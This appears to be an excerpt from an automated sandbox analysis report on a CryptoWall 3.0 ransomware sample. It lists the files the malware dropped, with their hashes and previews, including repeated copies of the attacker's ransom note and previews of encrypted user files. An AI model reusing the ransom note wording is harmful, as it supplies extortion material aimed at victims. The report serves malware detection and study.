                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1005\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1006\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1006\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\$Recycle.Bin\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\$Recycle.Bin\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Config.Msi\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:true
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Config.Msi\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:true
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6382
                                                                                                                          Entropy (8bit):7.953972400342168
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GovLnUcws4sQ6en3CI1tMbOMGTa6Hp4JlD5y:GIArsQ6en4L6J4JLy
                                                                                                                          MD5:456A66D829191A53BD1BEC55D81A9F13
                                                                                                                          SHA1:65EE4ABE7E0A5C7C1B65E133FE00C3B4880DAAF3
                                                                                                                          SHA-256:DCDA40FA7D4B242D82A4B18DA79B3E1B65536C6E812A3287AA64E56CF258456C
                                                                                                                          SHA-512:C02DFF14077B86EAF9208BC780C70DFF09EA5C7E2489558DC429EF688AED5D48707ECE4CD8F6C2D5AC866F44004AC0EC6DD6F8B83E811177F459BDF330D7B923
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....?....?.@x.3..L...ru.U..J...u.q.K..V.C}...9.VjQD..V.S.#......w..~.y.o.......|.J3..c........}...[...l..i.^...9.t.:{.ED)....3`..-A...ut../...7....+..........!V..'.+.Gd..5z}...O.5.Wf....0....F.b.~q|.YOY.7......G...2.......A.....L.....z3Cd'05V.D..4...\[e.5..v..Dz...v....P.L9 .\.2U.......J.yp.....#R.!.G....ys.....>o..a...../.....E....,..mM.~.}.....9.Ml.nA..............j%...*..v.EE8.{..j...M...P..L>t.s...o*....[........k..%b.)>...+.as.....i.oe.&u"...lB0.w...,$..i.S.6x.%..w...8.`WB6J...f.%2c.~..I....j.j.2X?Y0...'G....).....i|..C.)4R.U\Tk1?....dqk6.G.....j.,!*..?.Q.|.

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\chrome_shutdown_ms.txt.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):430
                                                                                                                          Entropy (8bit):5.913381561430947
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2TkIdn:c+z5U4a8OoDUX+S2TkIdn
                                                                                                                          MD5:9559B4B0A7E9B54F1E77FDDFF1BA4D3C
                                                                                                                          SHA1:AD0C9C5A7AFB954840386E2600C61087CA1FE854
                                                                                                                          SHA-256:FFC25C9C9000BBC75F3E0551D09FC70DFBE7C10D6EA6832420CD10C8A5D4C198
                                                                                                                          SHA-512:3D18EF1764A5FDD452222ED35DA3830FA9ED2C869AF3AA0193EE39A2B9AA44723F71FC66E69A4961433C6EBC02C5FCCE4A8CAB3A5A4F1EC6130AEB07814254E7
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..#..[R@JLA.....*4....n.......oF}..?.

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Bears.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1918
                                                                                                                          Entropy (8bit):7.770366939156214
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgLUDX1N54dE5TWJwiA+P17YuqYq/4jL1uKnLulxetx:cztoDAUDZ5oJV7tq9cLcKLjx
                                                                                                                          MD5:8798046759AB3AF89ED26DD4348AF901
                                                                                                                          SHA1:A2C4073B0DDE315F11F93A9817B728B66665336E
                                                                                                                          SHA-256:F9AEAF521CD1C6C989DECB96ABF12487846683BBE367AD8F4806E090F49D4C14
                                                                                                                          SHA-512:3F2E1FAC9A5088FDD8FD21086CF6A6B66979ED9E1859A0CEB5F3AC36138C68D4B62E87BE4D6FE6A4984C113CA4A7AF36163FA9077F8564E5A97BAADEAFF95DB0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....)."......K....3;G.....A...H.xx.9..o.......H.x....|.K^.lA.O3qhI....|..s.....&..'Eo.....e..M&K=..r...m...........Z.a.o,a..w)....^............mY......7.k..|....?,....0@h..j...L....2....v<..gf...D.;*#....V..Z.z........4...b....1....|.6......H..I.V..?..~O. ...\W..~...aN....Z<%....".....u..O..0. .G.....g...p.!..I.a.:...<D1..#.-..f.}T.........{57../.E.LZ..4../.U.q.4P..|.H...1...T...=..Q.....j.....n#&...]_-.k.....D..8l...@..wB.U.....,..z..'..^a.gl..#B7fM-...dv~.z.,.8.....z=q~...Z.s...O...`..oU..".tj;.v...o../x{...,.3W.........Z..x.n........N.6...M.....b..y. /..X.@..

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Roses.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2766
                                                                                                                          Entropy (8bit):7.874635302470787
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg7S8CJt0IT2CM5Z3VESHCybpgbKnxvRqUDklAeSny9:cztoDr8CgIT21v3VfxpEKeowGy9
                                                                                                                          MD5:0A7832618AA20DB05CDD173B8F944E1C
                                                                                                                          SHA1:61CA681B5BBD91D6CD6CE65C622AA18C5636B9B5
                                                                                                                          SHA-256:154DE12C528D8C0095153DD9FD506BD31624841954E1B2E2D6E3C37892DEE26E
                                                                                                                          SHA-512:831F3FA6E270CFB2D922F8701779D854FDF7C1546CF8582B20896DAB038AA9545AFD4B57A7C6CE94617AC5396F107BBF6DAEFF5FD9E5DE7B37E355970C1CB1F8
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...B.8.jO ..8...........i..<....4...8.pu..n.(..>0.q-...S..z.n.EG._...#.b9.<.h........<[._i.c.?.@.i._.`w.......a..TWtp.C...'.]......O....o.?.O....]2... a.t.!.s6.a[.):.bu.X ...3....+y.l.V..h.]..&..(.e........._^^5nW%..xj^..N.o.%!1...ZJ..]...Lts....#'..;.T.x......)&..f.S!>GV-..8Y..k....A..`\&.....'..<o...b^..T.G..,.O.o..k..)G...%.`X.~...hc....,.....1'........Z...zs.a....=\..m..FUA1.M...RN.Db.f.......ZR..8X.~..Kp...e".../.#..}.1.t@.=.L.B..H^zg...R.>:.OW..m....Z.gZ9.0n<..R..d...lU.$...V.97wyh...t.5gvB.y.i.i:c.E.n.Q.PQ...f......g.~_..h.[.,..x.d.sG......w....)..z.Q..v.....

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Mail\Stationery\Stars.jpg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8350
                                                                                                                          Entropy (8bit):7.969185143276263
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoLzQmlB2dQeINLDzs96g1ERZTikOROFkeS8iFqSTaJTTuXjIbc:GOzrJhz3bTikNaeFEqZ/uXj9
                                                                                                                          MD5:923F96EFE00E329A2EF0E95597A2B3FC
                                                                                                                          SHA1:A69F0879508998A4D95E62E90ADED3A20FD7DDD4
                                                                                                                          SHA-256:476B2E30AB4A7459DFDB9E822B2E9B43DA23612E7364AAFFB1F34BC15DE1F10A
                                                                                                                          SHA-512:D7EB551CBDA2A8EBE0F71953BA11F9054A3208B19530602BC8878A6A006181C095ED8647718104F8ACFBB489529FE26176EFA6A7A77504A8DB9A93AD1386EE4C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...........CWk.......frlj..P.....|....6m.........-.8#...<5p...t...L../i..0.....w........f.X.X...Cs..!.q4..5dw.XE@......e?..$Z..Gf......j..W]=.C...........x...So.V.$xW.....j.0.........E....1.v.v.Pszj.2............\.W...K..4....F....0......Mg..z.:....c..X...u..jrR.k..Y..-.....~.b3.].....Vw....1c...)..t.....r....n.x\R............xd.I..'.gZ..K..P.._,...._..V1.....iOr.s'....&.N.1uv[.#.Y..Ef....O.gx.f....B8.a'.Y<..8.Y.."..z]..!%.*[jr.....4...{.._L.6}t.....Z...'C...qb.&..)....<.w...M%..V..v....h..d...........S.%.{..Hv@6U.l..+.{.)r..B..l......].r..>.;|.....ng..}+....'...y...=vN.;.

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.338732154224879
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2fLvmNWDGxArI:c+z5U4a8OoDUX+S2SNWDGxAU
                                                                                                                          MD5:4A1A5591251F295EF69EE166E1E25029
                                                                                                                          SHA1:C890ACF5E4C86AC94C7A5CE857B4E9D9A66E9C94
                                                                                                                          SHA-256:A833299AD64403E10C37B5D48635752D956A50FD37B7E21EEFAE15BAD7579F6F
                                                                                                                          SHA-512:1467E6D4F06BA1823ECE13DF5668DF56C415EC41358D3CE708DE726B6C27AFAD4A954381B26E68F2A2D3F36ABD7D6034A706148F430AA018D5DD96827C8057F9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...bi.}3...pD.B.._....M.../.M.O....I....3.........g.Z.O.....zz..&.....T.1..FM.[...B.m....i4.].K.QemY.juO@fu.....

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.361406768372272
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2xKqMmxFylR7:c+z5U4a8OoDUX+S2ZXFy
                                                                                                                          MD5:DED38ED2CFC47889A13C8C9491B16D54
                                                                                                                          SHA1:19E53E29D08EBC583A452210B206349099A131F3
                                                                                                                          SHA-256:288E21E8451934CC4F5ADC10572E67634CDDAE50BFF21DE8F03F338CD8E026DD
                                                                                                                          SHA-512:F3AEB20A51F2D160AFEC6BDC3127C23058E58E2028F37A37C93EFE11F903A7A78FDED6AAF8DC947EEAEA4C352341E9FC63086252F2E9A8854DE58061A878E543
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...c.kz....>.o..6.[....i..xG..3...(..d~cs...$.....&..g....B...Am..v....q..(j.....7....q...&..~......-....S\\C

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\128.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4334
                                                                                                                          Entropy (8bit):7.932371040727839
                                                                                                                          Encrypted:false
